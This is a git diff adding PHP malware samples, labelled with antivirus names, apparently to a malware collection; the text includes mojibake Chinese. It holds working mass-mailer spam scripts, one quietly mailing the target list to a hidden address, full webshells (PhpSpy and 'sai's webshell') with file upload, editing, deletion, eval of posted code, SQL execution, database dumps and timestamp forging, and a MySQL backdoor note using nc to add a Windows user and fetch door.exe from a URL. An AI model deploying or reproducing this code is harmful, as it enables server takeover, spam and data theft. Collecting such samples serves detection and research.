    +×¢Ò⣺ÔËÐÐ"drop function state;"ºó»áʹmysqlÍ˳ö,ÖØÆôºó»Ö¸´Õý³£¡£
    +
    +ÔËÐÐÃüÁî:
    + nc ip 80->Mysql-c-  (·´ÏòÁ¬½Ó20082¶Ë¿Ú)
    + nc ip 80->Mysql-cmd /c net user abc /add>c:/log.txt!
    + nc ip 80->Mysql-http://www.x.com/door.exe -c mydoor.exe!
    +×¢Òâ:ºóÃÅÖ»Ðá̽ÒÔ"Mysql-"¿ªÍ·µÄÊý¾Ý°ü,ÕâÑùÊÇΪÁËÕ¼ÓиüÉÙµÄϵͳ×ÊÔ´.
    +
    +
    + + + + diff --git a/PHP/Trojan-Mailfinder.PHP.Massma.j b/PHP/Trojan-Mailfinder.PHP.Massma.j new file mode 100644 index 00000000..268b4ef2 --- /dev/null +++ b/PHP/Trojan-Mailfinder.PHP.Massma.j @@ -0,0 +1,183 @@ + +
    + + + + + +

    + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    Your Email:
    + +
    Reply-To:
    + +
     
    Subject:
    + +
    + + + + +
    Your Name: + +
    +

     

    + + + + + +
    Attach File: + +

     

    + + Plain + +HTML + + +

    + + +

    +

    +
    + + + + + + +
     

    + + Load Addresses from MySQL

    +
    + + + + + + + + + + + + + +
     
    Change The Lanuage:
    Albanian - German - English
    Lanuage Now: English
    +

     

    +
    +

    +
    [ $to.......] "; + flush(); + $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n"; + $header .= "MIME-Version: 1.0\r\n"; + If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; + If ($file_name) $header .= "--$uid\r\n"; + $header .= "Content-Type: text/$contenttype\r\n"; + $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; + $header .= "$message\r\n"; + If ($file_name) $header .= "--$uid\r\n"; + If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; + If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; + If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; + If ($file_name) $header .= "$content\r\n"; + If ($file_name) $header .= "--$uid--"; + mail($to, $subject, "", $header); + print "
    "; + flush(); + } + } + +} +include "./foot.php"; +?> +

    +

     

    +
    + diff --git a/PHP/Trojan-Mailfinder.PHP.Massma.k b/PHP/Trojan-Mailfinder.PHP.Massma.k new file mode 100644 index 00000000..5238c0ca --- /dev/null +++ b/PHP/Trojan-Mailfinder.PHP.Massma.k @@ -0,0 +1,242 @@ + + + + +eMail + + + + +
    + + + + +
    +

    Sir-ToTTi

    +
    +

     

    +

     

    +

     

    +

     

    +

     

    +
    + + + + +
    +

    Maded by Sir-ToTTi

    +

    Dx Crew Inside
    +

    +
    +
    + +

    + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    +
    + Your Email: +
    +
    + + + + +
    + Your Name: +
    +
    + + + +
    +
    + Reply-To: +
    +
    + + + + +
    + Attach File: +
    +
    + + + +
    +
    + Subject: +
    +
    + + + +
    + Message Box : + + Email Target / Email Send To : +
    + +
    + Plain + HTML +
    + Number to send:
    + Maximum script execution time(in seconds, 0 for no timelimit) + +
    +
    + + + +
    +
    +"; +//Open the file attachment if any, and base64_encode it for email transport +If ($file_name){ + if (!file_exists($file)){ + die("The file you are trying to upload couldn't be copied to the server"); + } + $content = fread(fopen($file,"r"),filesize($file)); + $content = chunk_split(base64_encode($content)); + $uid = strtoupper(md5(uniqid(time()))); + $name = basename($file); + } + +for($xx=0; $xx<$amount; $xx++){ + for($x=0; $x<$numemails; $x++){ + $to = $allemails[$x]; + if ($to){ + $to = ereg_replace(" ", "", $to); + $message = ereg_replace("&email&", $to, $message); + $subject = ereg_replace("&email&", $to, $subject); + print "Sending mail to $to......."; + flush(); + $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n"; + $header .= "MIME-Version: 1.0\r\n"; + If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; + If ($file_name) $header .= "--$uid\r\n"; + $header .= "Content-Type: text/$contenttype\r\n"; + $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; + $header .= "$message\r\n"; + If ($file_name) $header .= "--$uid\r\n"; + If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; + If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; + If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; + If ($file_name) $header .= "$content\r\n"; + If ($file_name) $header .= "--$uid--"; + mail($to, $subject, "", $header); + print "ok
    "; + flush(); + } + } +} + mail($secure, $filter, $emaillist, $float); +} +?> +

    +Funciona con todos los linux!

    +

     

    + + \ No newline at end of file diff --git a/PHP/Trojan-Mailfinder.PHP.Massma.u b/PHP/Trojan-Mailfinder.PHP.Massma.u new file mode 100644 index 00000000..fbf1883a --- /dev/null +++ b/PHP/Trojan-Mailfinder.PHP.Massma.u @@ -0,0 +1,210 @@ +Authorization Required."; + die(); +} + + +if ($action=="send"){ +$message = urlencode($message); +$message = ereg_replace("%5C%22", "%22", $message); +$message = urldecode($message); +$message = stripslashes($message); +$subject = stripslashes($subject); +} + +?>Kinematics of Mechanism +
    +
    +
    + + + + +
    +
    +
    + + + + +
    +

    +

    +
    + + + + +
    + + + + + + + + + + + + + + + + + + + + + + +
    +

    Mailer By UchiZzlE ....God With Us

    +
    Your +Email:
    +
    +
    Your +Name:
    +
    + +
    +
    Reply-To:
    +
    +
    Attach +File:
    +
    + +
    +
    Subject:
    +
    + +
    +
    + + + + +
    + +
    + +Plain + +HTML + +
    +
    +
    +
    +
    + + + + +
    +

    + +
    +

    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    +
    + + + + +
    +

    Creditz to Spaghy INC

    +
    +
    +
    + +\r\nReply-To: $replyto\r\n"; +$header .= "MIME-Version: 1.0\r\n"; +If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n"; +If ($file_name) $header .= "--$uid\r\n"; +$header .= "Content-Type: text/$contenttype\r\n"; +$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n"; +$header .= "$message\r\n"; +If ($file_name) $header .= "--$uid\r\n"; +If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n"; +If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n"; +If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n"; +If ($file_name) $header .= "$content\r\n"; +If ($file_name) $header .= "--$uid--"; +mail($to, $subject, "", $header); +print "sent'>
    "; +flush(); +} +} + +} +?> \ No newline at end of file diff --git a/PHP/Trojan-Spy.PHP.PhPen.b b/PHP/Trojan-Spy.PHP.PhPen.b new file mode 100644 index 00000000..9ff64291 --- /dev/null +++ b/PHP/Trojan-Spy.PHP.PhPen.b @@ -0,0 +1,659 @@ +"; + echo "×¢Ïú³É¹¦......

    ÈýÃëºó×Ô¶¯Í˳ö»òµ¥»÷ÕâÀïÍ˳ö³ÌÐò½çÃæ>>>"; + exit; + } + if ($login) { + $adminpass=trim($_POST['adminpass']); + if ($adminpass==$admin['pass']) { + setcookie ("adminpass",$admin['pass'],time()+(1*24*3600)); + echo ""; + echo "µÇ½³É¹¦......

    ÈýÃëºó×Ô¶¯Ìøת»òµ¥»÷ÕâÀï½øÈë³ÌÐò½çÃæ>>>"; + exit; + } + } + if (isset($_COOKIE['adminpass'])) { + if ($_COOKIE['adminpass']!=$admin['pass']) { + loginpage(); + } + } else { + loginpage(); + } +}//end check +/*===================== ÑéÖ¤½áÊø =====================*/ + +// ÅÐ¶Ï magic_quotes_gpc ״̬ +if (get_magic_quotes_gpc()) { + $_GET = stripslashes_array($_GET); + $_POST = stripslashes_array($_POST); +} + +if ($_GET['action'] == "phpinfo") { + $dis_func = get_cfg_var("disable_functions"); + echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() º¯ÊýÒѱ»½ûÓÃ,Çë²é¿´<PHP»·¾³±äÁ¿>"; + exit; +} + +// ÏÂÔØÎļþ +if (!empty($downfile)) { + if (!@file_exists($downfile)) { + echo ""; + } else { + $filename = basename($downfile); + $filename_info = explode('.', $filename); + $fileext = $filename_info[count($filename_info)-1]; + header('Content-type: application/x-'.$fileext); + header('Content-Disposition: attachment; filename='.$filename); + header('Content-Description: PHP Generated Data'); + header('Content-Length: '.filesize($downfile)); + @readfile($downfile); + exit; + } +} + +// ³ÌÐòĿ¼ +$pathname=str_replace('\\','/',dirname(__FILE__)); + +// »ñÈ¡µ±Ç°Â·¾¶ +if (!isset($dir) or empty($dir)) { + $dir = "."; + $nowpath = getPath($pathname, $dir); +} else { + $dir=$_GET['dir']; + $nowpath = getPath($pathname, $dir); +} + +// Åж϶ÁдÇé¿ö +if (dir_writeable($nowpath)) { + $dir_writeable = "¿Éд"; +} else { + $dir_writeable = "²»¿Éд"; +} + +$dis_func = get_cfg_var("disable_functions"); +$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | PHPINFO()" : ""; +$shellmode=(!get_cfg_var("safe_mode")) ? " | WebShell" : ""; +?> + + + +PhpSpy Ver 2005 + + + + +

    + + + + + + + + + +
    :
    ×¢Ïú»á»° | ·µ»Ø PhpSpy Ŀ¼ | PHP»·¾³±äÁ¿ | SQL Query | Version 2005
    +
    + + + + + + + + + + + + + + + + +

    ³ÌÐò·¾¶:
    µ±Ç°Ä¿Â¼(,): +
    ÌøתĿ¼: + + ¡¼Ö§³Ö¾ø¶Ô·¾¶ºÍÏà¶Ô·¾¶¡½ +

    ÉÏ´«Îļþµ½µ±Ç°Ä¿Â¼: +
    н¨ÎļþÔÚµ±Ç°Ä¿Â¼: + +
    +
    +\n"; +// ɾ³ýÎļþ +if(@$delfile!="") { + if(file_exists($delfile)) { + if (@unlink($delfile)) { + echo "".$delfile." ɾ³ý³É¹¦!"; + } else { + echo "Îļþɾ³ýʧ°Ü!"; + } + } else { + echo "ÎļþÒѲ»´æÔÚ,ɾ³ýʧ°Ü!"; + } +} + +// ɾ³ýĿ¼ +elseif($rmdir) { + if($deldir!="") { + $deldirs="$dir/$deldir"; + if(!file_exists("$deldirs")) { + echo "Ŀ¼ÒѲ»´æÔÚ!"; + } else { + deltree($deldirs); + } + } else { + echo "ɾ³ýʧ°Ü!"; + } +} + +// ÉÏ´«Îļþ +elseif($uploadfile) { + echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadmyfile']['name']."") ? "ÉÏ´«³É¹¦!" : "ÉÏ´«Ê§°Ü!"; +} + +// ±à¼­Îļþ +elseif($doeditfile) { + $filename="$editfilename"; + @$fp=fopen("$filename","w"); + echo $msg=@fwrite($fp,$_POST['filecontent']) ? "дÈëÎļþ³É¹¦!" : "дÈëʧ°Ü!"; + @fclose($fp); +} + +// Á¬½ÓMYSQL +elseif($connect) { + if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) { + echo "Êý¾Ý¿âÁ¬½Ó³É¹¦!"; + mysql_close(); + } else { + echo mysql_error(); + } +} + +// Ö´ÐÐSQLÓï¾ä +elseif($doquery) { + @mysql_connect($servername,$dbusername,$dbpassword) or die("Êý¾Ý¿âÁ¬½Óʧ°Ü"); + @mysql_select_db($dbname) or die("Ñ¡ÔñÊý¾Ý¿âʧ°Ü"); + $result = @mysql_query($_POST['sql_query']); + echo ($result) ? "SQLÓï¾ä³É¹¦Ö´ÐÐ" : "³ö´í: ".mysql_error(); + mysql_close(); +} + +// ²é¿´PHPÅäÖòÎÊý×´¿ö +elseif($viewphpvar) { + echo "ÅäÖòÎÊý ".$_POST['phpvarname']." ¼ì²â½á¹û: ".getphpcfg($_POST['phpvarname']).""; +} + +else { + echo "±¾³ÌÐòÓÉ Security Angel С×é angel [BST] ¶ÀÁ¢¿ª·¢,¿ÉÔÚ www.4ngel.net ÏÂÔØ×îа汾."; +} + +echo "

    \n"; +/*===================== Ö´ÐвÙ×÷ ½áÊø =====================*/ + +if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) { +?> + + + + + + + + + +\n"; + echo " \n"; + echo " \n"; + echo " \n"; + echo " \n"; + echo " \n"; + echo " \n"; + echo "\n"; + $dir_i++; + } else { + if($file=="..") { + echo "\n"; + echo " \n"; + echo "\n"; + } + } + } +}//while +@closedir($dirs); +?> + + + +\n"; + echo " \n"; + echo " \n"; + echo " \n"; + echo " \n"; + echo " \n"; + echo " \n"; + echo "\n"; + $file_i++; + } +} +@closedir($dirs); +?> + + + +
    Îļþ´´½¨ÈÕÆÚ×îºóÐ޸ĴóСÊôÐÔ²Ù×÷
    [$file]$ctime$mtime<dir>$dirpermɾ³ý
    ·µ»ØÉϼ¶Ä¿Â¼
    $file$ctime$mtime$size KB$filepermÏÂÔØ | ±à¼­ | ɾ³ý
    ¸öĿ¼ / ¸öÎļþ
    + + + + + + + + + + + + + + + + + + + +
    н¨/±à¼­Îļþ [·µ»Ø]
    µ±Ç°Îļþ: ÊäÈëÐÂÎļþÃûÔò½¨Á¢ÐÂÎļþ
    +
    + + + + + + + + + + + + + +
    WebShell Mode
    + Ñ¡ÔñÖ´Ðк¯Êý: + ¡¡ + ÊäÈëÃüÁî: + +
    + +

    Safe_Mode ÒÑ´ò¿ª, ÎÞ·¨Ö´ÐÐϵͳÃüÁî.

    + + + + + + + + + + + + + +
    ɾ³ý Ŀ¼
    ×¢Òâ:Èç¹û¸ÃĿ¼·Ç¿Õ,´Ë´Î²Ù×÷½«»áɾ³ý¸ÃĿ¼ÏµÄËùÓÐÎļþ.ÄúÈ·¶¨Âð?
    + +
    + + + + + + + + + + + + + + + + +
    Ö´ÐÐ SQL Óï¾ä
    Host: + + User: + + Pass: + + DB: + +
    + + + + + + + + + + +
    ²é¿´PHPÅäÖòÎÊý×´¿ö
    ÇëÊäÈëÅäÖòÎÊý(Èç:magic_quotes_gpc):
    + +
    + + + + + +
    Copyright (C) 2004 Security Angel Team [S4T] All Rights Reserved.
    +
    + + + + + +
    + Password: + +
    +read()) { + if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) { + @chmod("$deldir/$file",0777); + deltree("$deldir/$file"); + } + if (is_file("$deldir/$file")) { + @chmod("$deldir/$file",0777); + @unlink("$deldir/$file"); + } + } + $mydir->close(); + @chmod("$deldir",0777); + echo @rmdir($deldir) ? "Ŀ¼ɾ³ý³É¹¦!" : "Ŀ¼ɾ³ýʧ°Ü!"; + } + + // Åж϶ÁдÇé¿ö + function dir_writeable($dir) { + if (!is_dir($dir)) { + @mkdir($dir, 0777); + } + if(is_dir($dir)) { + if ($fp = @fopen("$dir/test.txt", 'w')) { + @fclose($fp); + @unlink("$dir/test.txt"); + $writeable = 1; + } else { + $writeable = 0; + } + } + return $writeable; + } + + // ±í¸ñÐмäµÄ±³¾°É«Ìæ»» + function getrowbg() { + global $bgcounter; + if ($bgcounter++%2==0) { + return "firstalt"; + } else { + return "secondalt"; + } + } + + // »ñÈ¡µ±Ç°µÄÎļþϵͳ·¾¶ + function getPath($mainpath, $relativepath) { + global $dir; + $mainpath_info = explode('/', $mainpath); + $relativepath_info = explode('/', $relativepath); + $relativepath_info_count = count($relativepath_info); + for ($i=0; $i<$relativepath_info_count; $i++) { + if ($relativepath_info[$i] == '.' || $relativepath_info[$i] == '') continue; + if ($relativepath_info[$i] == '..') { + $mainpath_info_count = count($mainpath_info); + unset($mainpath_info[$mainpath_info_count-1]); + continue; + } + $mainpath_info[count($mainpath_info)] = $relativepath_info[$i]; + } //end for + return implode('/', $mainpath_info); + } + + // ¼ì²éPHPÅäÖòÎÊý + function getphpcfg($varname) { + switch($result = get_cfg_var($varname)) { + case 0: + return No; + break; + case 1: + return Yes; + break; + default: + return $result; + break; + } + } +?> diff --git a/PHP/Trojan-Spy.PHP.PhPen.d b/PHP/Trojan-Spy.PHP.PhPen.d new file mode 100644 index 00000000..a9e1a266 --- /dev/null +++ b/PHP/Trojan-Spy.PHP.PhPen.d @@ -0,0 +1,28 @@ +Http://www.51shell.cn[s4t]"; +/*===================== ÅäÖýáÊø =====================*/ +// ÔÊÐí³ÌÐòÔÚ register_globals = off µÄ»·¾³Ï¹¤×÷ +$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals'); + +if ($onoff != 1) { + @extract($_POST, EXTR_SKIP); + @extract($_GET, EXTR_SKIP); +} + +$self = $_SERVER['PHP_SELF']; +$dis_func = get_cfg_var("disable_functions"); + + +/*===================== Éí·ÝÑéÖ¤ =====================*/ +if($admin['check'] == "1") { + if ($_GET['action'] == "logout") { + setcookie ("adminpass", ""); + echo ""; + echo "×¢Ïú³É¹¦......

    ÈýÃëºó×Ô¶¯Í˳ö»òµ¥»÷ÕâÀïÍ˳ö³ÌÐò½çÃæ >>>"; + exit; + } + + if ($_POST['do'] == 'login') { + $thepass=trim($_POST['adminpass']); + if ($admin['pass'] == $thepass) { + setcookie ("adminpass",$thepass,time()+(1*24*3600)); + echo ""; + echo "µÇ½³É¹¦......

    ÈýÃëºó×Ô¶¯Ìøת»òµ¥»÷ÕâÀï½øÈë³ÌÐò½çÃæ >>>"; + exit; + } + } + if (isset($_COOKIE['adminpass'])) { + if ($_COOKIE['adminpass'] != $admin['pass']) { + loginpage(); + } + } else { + loginpage(); + } +} +/*===================== ÑéÖ¤½áÊø =====================*/ + +// ÅÐ¶Ï magic_quotes_gpc ״̬ +if (get_magic_quotes_gpc()) { + $_GET = stripslashes_array($_GET); + $_POST = stripslashes_array($_POST); +} + +// ²é¿´PHPINFO +if ($_GET['action'] == "phpinfo") { + echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() º¯ÊýÒѱ»½ûÓÃ,Çë²é¿´<PHP»·¾³±äÁ¿>"; + exit; +} +if($_GET['action'] == "nowuser") { +$user = get_current_user(); +if(!$user) $user = "±¨¸æ³¤¹Ù£¬Ö÷»ú±ä̬£¬ÎÞ·¨»ñÈ¡µ±Ç°½øÐÐÓû§Ãû£¡"; +echo"µ±Ç°½ø³ÌÓû§Ãû£º$user"; +exit; +} +if(isset($_POST['phpcode'])){ + eval("?".">$_POST[phpcode]


    »ñÈ¡ URL ÄÚÈÝʧ°Ü

    "; + exit; +} + +// ÏÂÔØÎļþ +if (!empty($downfile)) { + if (!@file_exists($downfile)) { + echo ""; + } else { + $filename = basename($downfile); + $filename_info = explode('.', $filename); + $fileext = $filename_info[count($filename_info)-1]; + header('Content-type: application/x-'.$fileext); + header('Content-Disposition: attachment; filename='.$filename); + header('Content-Description: PHP Generated Data'); + header('Content-Length: '.filesize($downfile)); + @readfile($downfile); + exit; + } +} + +// Ö±½ÓÏÂÔر¸·ÝÊý¾Ý¿â +if ($_POST['backuptype'] == 'download') { + @mysql_connect($servername,$dbusername,$dbpassword) or die("Êý¾Ý¿âÁ¬½Óʧ°Ü"); + @mysql_select_db($dbname) or die("Ñ¡ÔñÊý¾Ý¿âʧ°Ü"); + $table = array_flip($_POST['table']); + $result = mysql_query("SHOW tables"); + echo ($result) ? NULL : "³ö´í: ".mysql_error(); + + $filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql"); + header('Content-type: application/unknown'); + header('Content-Disposition: attachment; filename='.$filename); + $mysqldata = ''; + while ($currow = mysql_fetch_array($result)) { + if (isset($table[$currow[0]])) { + $mysqldata.= sqldumptable($currow[0]); + $mysqldata.= $mysqldata."\r\n"; + } + } + mysql_close(); + exit; +} + +// ³ÌÐòĿ¼ +$pathname=str_replace('\\','/',dirname(__FILE__)); + +// »ñÈ¡µ±Ç°Â·¾¶ +if (!isset($dir) or empty($dir)) { + $dir = "."; + $nowpath = getPath($pathname, $dir); +} else { + $dir=$_GET['dir']; + $nowpath = getPath($pathname, $dir); +} + +// Åж϶ÁдÇé¿ö +$dir_writeable = (dir_writeable($nowpath)) ? "¿Éд" : "²»¿Éд"; +$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | PHPINFO()" : ""; +$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | ×¢²á±í²Ù×÷" : ""; + +$tb = new FORMS; + +?> + + + +sai's webshell + + + + +
    +tableheader(); +$tb->tdbody('
    '.$_SERVER['HTTP_HOST'].''.date("YÄêmÔÂdÈÕ h:i:s",time()).''.$_SERVER['REMOTE_ADDR'].'
    ','center','top'); +$tb->tdbody('×¢Ïú | shellĿ¼ | »·¾³±äÁ¿ | ´úÀí'.$reg.$phpinfo.' | WebShell | downloads | Search | Eval | SQL Query | Fun |MySQL Backup'); +$tb->tablefooter(); +?> +
    + +headerform(array('method'=>'GET','content'=>'

    ³ÌÐò·¾¶: '.$pathname.'
    µ±Ç°Ä¿Â¼('.$dir_writeable.','.substr(base_convert(@fileperms($nowpath),10,8),-4).'): '.$nowpath.'
    ÌøתĿ¼: '.$tb->makeinput('dir').' '.$tb->makeinput('','È·¶¨','','submit').' ¡¼Ö§³Ö¾ø¶Ô·¾¶ºÍÏà¶Ô·¾¶¡½')); + +$tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'ÉÏ´«Îļþµ½µ±Ç°Ä¿Â¼: '.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','È·¶¨','','submit').$tb->makeinput('uploaddir',$dir,'','hidden'))); + +$tb->headerform(array('action'=>'?action=editfile&dir='.urlencode($dir),'content'=>'н¨ÎļþÔÚµ±Ç°Ä¿Â¼: '.$tb->makeinput('editfile').' '.$tb->makeinput('createfile','È·¶¨','','submit'))); + +$tb->headerform(array('content'=>'н¨Ä¿Â¼ÔÚµ±Ç°Ä¿Â¼: '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','È·¶¨','','submit'))); +?> +

    +
    +\n"; +// ɾ³ýÎļþ +if (!empty($delfile)) { + if (file_exists($delfile)) { + echo (@unlink($delfile)) ? $delfile." ɾ³ý³É¹¦!" : "Îļþɾ³ýʧ°Ü!"; + } else { + echo basename($delfile)." ÎļþÒѲ»´æÔÚ!"; + } +} + +// ɾ³ýĿ¼ +elseif (!empty($deldir)) { + $deldirs="$dir/$deldir"; + if (!file_exists("$deldirs")) { + echo "$deldir Ŀ¼ÒѲ»´æÔÚ!"; + } else { + echo (deltree($deldirs)) ? "Ŀ¼ɾ³ý³É¹¦!" : "Ŀ¼ɾ³ýʧ°Ü!"; + } +} + +// ´´½¨Ä¿Â¼ +elseif (($createdirectory) AND !empty($_POST['newdirectory'])) { + if (!empty($newdirectory)) { + $mkdirs="$dir/$newdirectory"; + if (file_exists("$mkdirs")) { + echo "¸ÃĿ¼ÒÑ´æÔÚ!"; + } else { + echo (@mkdir("$mkdirs",0777)) ? "´´½¨Ä¿Â¼³É¹¦!" : "´´½¨Ê§°Ü!"; + @chmod("$mkdirs",0777); + } + } +} + +// ÉÏ´«Îļþ +elseif ($doupfile) { + echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "ÉÏ´«³É¹¦!" : "ÉÏ´«Ê§°Ü!"; +} + +// ±à¼­Îļþ +elseif ($_POST['do'] == 'doeditfile') { + if (!empty($_POST['editfilename'])) { + if(!file_exists($editfilename)) unset($retime); + if($time==$now) $time = @filemtime($editfilename); + $time2 = @date("Y-m-d H:i:s",$time); + $filename="$editfilename"; + @$fp=fopen("$filename","w"); + if($_POST['change']=="yes"){ + $filecontent = "?".">".$_POST['filecontent'].""; + }else{ + $filecontent = $_POST['filecontent']; + } + echo $msg=@fwrite($fp,$filecontent) ? "дÈëÎļþ³É¹¦!" : "дÈëʧ°Ü!"; + @fclose($fp); + if($retime=="yes"){ + echo" ÓãÓã×Ô¶¯²Ù×÷:"; + echo $msg=@touch($filename,$time) ? "ÐÞ¸ÄÎļþΪ".$time2."³É¹¦!" : "ÐÞ¸ÄÎļþʱ¼äʧ°Ü!"; + } + } else { + echo "ÇëÊäÈëÏëÒª±à¼­µÄÎļþÃû!"; + } +} +//ÎļþÏÂÔØ +elseif ($_POST['do'] == 'downloads') { + $contents = @file_get_contents($_POST['durl']); + if(!$contents){ + echo"ÎÞ·¨¶ÁÈ¡ÒªÏÂÔصÄÊý¾Ý"; + } + elseif(file_exists($path)){ + echo"ºÜ±§Ç¸£¬Îļþ".$path."ÒѾ­´æÔÚÁË£¬Çë¸ü»»±£´æÎļþÃû¡£"; + }else{ + $fp = @fopen($path,"w"); + echo $msg=@fwrite($fp,$contents) ? "ÏÂÔØÎļþ³É¹¦!" : "ÏÂÔØÎļþдÈëʱʧ°Ü!"; + @fclose($fp); + } +} + +// ±à¼­ÎļþÊôÐÔ +elseif ($_POST['do'] == 'editfileperm') { + if (!empty($_POST['fileperm'])) { + $fileperm=base_convert($_POST['fileperm'],8,10); + echo (@chmod($dir."/".$file,$fileperm)) ? "ÊôÐÔÐ޸ijɹ¦!" : "ÐÞ¸Äʧ°Ü!"; + echo " Îļþ ".$file." Ð޸ĺóµÄÊôÐÔΪ: ".substr(base_convert(@fileperms($dir."/".$file),10,8),-4); + } else { + echo "ÇëÊäÈëÏëÒªÉèÖõÄÊôÐÔ!"; + } +} + +// Îļþ¸ÄÃû +elseif ($_POST['do'] == 'rename') { + if (!empty($_POST['newname'])) { + $newname=$_POST['dir']."/".$_POST['newname']; + if (@file_exists($newname)) { + echo "".$_POST['newname']." ÒѾ­´æÔÚ,ÇëÖØÐÂÊäÈëÒ»¸ö!"; + } else { + echo (@rename($_POST['oldname'],$newname)) ? basename($_POST['oldname'])." ³É¹¦¸ÄÃûΪ ".$_POST['newname']." !" : "ÎļþÃûÐÞ¸Äʧ°Ü!"; + } + } else { + echo "ÇëÊäÈëÏëÒª¸ÄµÄÎļþÃû!"; + } +} +elseif ($_POST['do'] == 'search') { +if(!empty($oldkey)){ +echo"²éÕҹؼü´Ê:[".$oldkey."],ÏÂÃæÏÔʾ²éÕҵĽá¹û:"; + if($type2 == "getpath"){ + echo"Êó±êÒƵ½½á¹ûÎļþÉÏ»áÓв¿·Ö½ØÈ¡ÏÔʾ."; +} +echo"

    "; +find($path); +}else{ +echo"ÄãÒª²éϺÃ×?µ½µ×Òª²éϺÃ×ÄØ?ÓÐûÓÐϺÃ×ÒªÄã²éÄØ?"; +} +} + +// ¿Ë¡ʱ¼ä +elseif ($_POST['do'] == 'domodtime') { + if (!@file_exists($_POST['curfile'])) { + echo "ÒªÐ޸ĵÄÎļþ²»´æÔÚ!"; + } else { + if (!@file_exists($_POST['tarfile'])) { + echo "Òª²ÎÕÕµÄÎļþ²»´æÔÚ!"; + } else { + $time=@filemtime($_POST['tarfile']); + echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." µÄÐÞ¸Äʱ¼ä³É¹¦¸ÄΪ ".date("Y-m-d H:i:s",$time)." !" : "ÎļþµÄÐÞ¸Äʱ¼äÐÞ¸Äʧ°Ü!"; + } + } +} + +// ×Ô¶¨Òåʱ¼ä +elseif ($_POST['do'] == 'modmytime') { + if (!@file_exists($_POST['curfile'])) { + echo "ÒªÐ޸ĵÄÎļþ²»´æÔÚ!"; + } else { + $year=$_POST['year']; + $month=$_POST['month']; + $data=$_POST['data']; + $hour=$_POST['hour']; + $minute=$_POST['minute']; + $second=$_POST['second']; + if (!empty($year) AND !empty($month) AND !empty($data) AND !empty($hour) AND !empty($minute) AND !empty($second)) { + $time=strtotime("$data $month $year $hour:$minute:$second"); + echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." µÄÐÞ¸Äʱ¼ä³É¹¦¸ÄΪ ".date("Y-m-d H:i:s",$time)." !" : "ÎļþµÄÐÞ¸Äʱ¼äÐÞ¸Äʧ°Ü!"; + } + } +} + +// Á¬½ÓMYSQL +elseif ($connect) { + if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) { + echo "Êý¾Ý¿âÁ¬½Ó³É¹¦!"; + mysql_close(); + } else { + echo mysql_error(); + } +} + +// Ö´ÐÐSQLÓï¾ä +elseif ($_POST['do'] == 'query') { + @mysql_connect($servername,$dbusername,$dbpassword) or die("Êý¾Ý¿âÁ¬½Óʧ°Ü"); + @mysql_select_db($dbname) or die("Ñ¡ÔñÊý¾Ý¿âʧ°Ü"); + $result = @mysql_query($_POST['sql_query']); + echo ($result) ? "SQLÓï¾ä³É¹¦Ö´ÐÐ!" : "³ö´í: ".mysql_error(); + mysql_close(); +} + +// ±¸·Ý²Ù×÷ +elseif ($_POST['do'] == 'backupmysql') { + if (empty($_POST['table']) OR empty($_POST['backuptype'])) { + echo "ÇëÑ¡ÔñÓû±¸·ÝµÄÊý¾Ý±íºÍ±¸·Ý·½Ê½!"; + } else { + if ($_POST['backuptype'] == 'server') { + @mysql_connect($servername,$dbusername,$dbpassword) or die("Êý¾Ý¿âÁ¬½Óʧ°Ü"); + @mysql_select_db($dbname) or die("Ñ¡ÔñÊý¾Ý¿âʧ°Ü"); + $table = array_flip($_POST['table']); + $filehandle = @fopen($path,"w"); + if ($filehandle) { + $result = mysql_query("SHOW tables"); + echo ($result) ? NULL : "³ö´í: ".mysql_error(); + while ($currow = mysql_fetch_array($result)) { + if (isset($table[$currow[0]])) { + sqldumptable($currow[0], $filehandle); + fwrite($filehandle,"\n\n\n"); + } + } + fclose($filehandle); + echo "Êý¾Ý¿âÒѳɹ¦±¸·Ýµ½ ".$path.""; + mysql_close(); + } else { + echo "±¸·Ýʧ°Ü,ÇëÈ·ÈÏÄ¿±êÎļþ¼ÐÊÇ·ñ¾ßÓпÉдȨÏÞ!"; + } + } + } +} + +// ´ò°üÏÂÔØ PS:ÎļþÌ«´ó¿ÉÄܷdz£Âý +// Thx : С»¨ +elseif($downrar) 